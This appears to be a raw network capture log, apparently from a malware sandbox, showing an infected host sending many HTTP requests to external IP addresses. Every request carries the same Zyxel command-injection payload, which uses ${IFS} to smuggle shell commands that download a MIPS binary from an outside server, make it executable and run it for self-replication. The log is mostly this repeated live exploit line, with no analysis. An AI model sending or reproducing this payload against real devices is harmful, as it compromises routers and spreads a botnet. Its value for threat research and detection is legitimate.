                                      Jan 19, 2024 17:29:47.072583914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8015192.168.2.144741260.133.74.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.072607040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8016192.168.2.144847018.76.145.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.072642088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8017192.168.2.1440954194.176.129.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.072711945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8018192.168.2.1455394110.50.92.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.072731972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8019192.168.2.1436352199.43.0.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.072784901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8020192.168.2.144820443.22.177.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.072799921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8021192.168.2.1436026106.202.35.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.072860003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8022192.168.2.1442080103.148.54.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.072896004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8023192.168.2.145310285.67.111.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.072937965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8024192.168.2.1442538104.233.48.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.072983980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8025192.168.2.1449024223.17.233.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.073054075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8026192.168.2.1454602194.16.200.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.073075056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8027192.168.2.143612648.239.16.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.073111057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8028192.168.2.1443632172.40.224.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.073141098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8029192.168.2.1458128223.167.42.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.073180914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8030192.168.2.144246447.90.74.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.073242903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8031192.168.2.14588028.81.80.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.073278904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8032192.168.2.143962495.201.98.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.073329926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8033192.168.2.1450862205.152.181.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.073365927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8034192.168.2.1458570172.236.119.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.073424101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8035192.168.2.144226831.79.225.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.073446989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8036192.168.2.145989680.217.133.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.073479891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8037192.168.2.1446244134.70.126.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.073534012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8038192.168.2.1439254105.58.232.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.073545933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8039192.168.2.1458874144.224.105.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.073601007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8040192.168.2.144803667.191.9.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.073643923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8041192.168.2.1438026185.218.253.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.073685884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8042192.168.2.1438392115.160.182.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.073709011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8043192.168.2.1450608205.177.40.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.073784113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8044192.168.2.1451122182.180.125.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.073821068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8045192.168.2.1456218118.15.178.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.073868036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8046192.168.2.145664823.164.137.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.073909998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8047192.168.2.144111252.193.129.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.073930979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8048192.168.2.1453576211.229.118.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.073992014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8049192.168.2.145446066.42.88.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.074032068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8050192.168.2.1434096117.62.114.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.074081898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8051192.168.2.1458098182.48.60.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.074096918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8052192.168.2.144798638.184.231.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.074148893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8053192.168.2.1446198132.236.30.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.074182987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8054192.168.2.1440482209.114.11.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.074239016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8055192.168.2.1435654110.165.80.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.074299097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8056192.168.2.143762850.3.76.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.074345112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8057192.168.2.1455980195.20.232.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.074378967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8058192.168.2.1446292178.15.116.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.074404001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8059192.168.2.145990844.71.253.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.074419975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8060192.168.2.1459004189.103.153.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.074454069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8061192.168.2.1452004188.35.240.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.074491024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8062192.168.2.14520221.55.143.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.074548006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8063192.168.2.1441530153.125.55.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.074594975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8064192.168.2.1439378163.5.31.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.074649096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8065192.168.2.1457070110.229.14.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.074681997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8066192.168.2.1457718223.63.43.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.074717045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8067192.168.2.145012251.39.12.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.074742079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8068192.168.2.1452014148.190.9.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.074786901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8069192.168.2.1444306209.46.153.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.074836969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8070192.168.2.144176693.9.246.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.074866056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8071192.168.2.143455264.182.60.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.074904919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8072192.168.2.143631250.167.14.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.074944973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8073192.168.2.1436632145.17.4.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.074990988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8074192.168.2.1443354186.15.51.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.075020075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8075192.168.2.1445194122.235.156.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.075088978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8076192.168.2.1445682105.170.182.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.075095892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8077192.168.2.1456998164.233.64.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:47.075129986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8078192.168.2.145437632.208.50.57443
                                      TimestampBytes transferredDirectionData
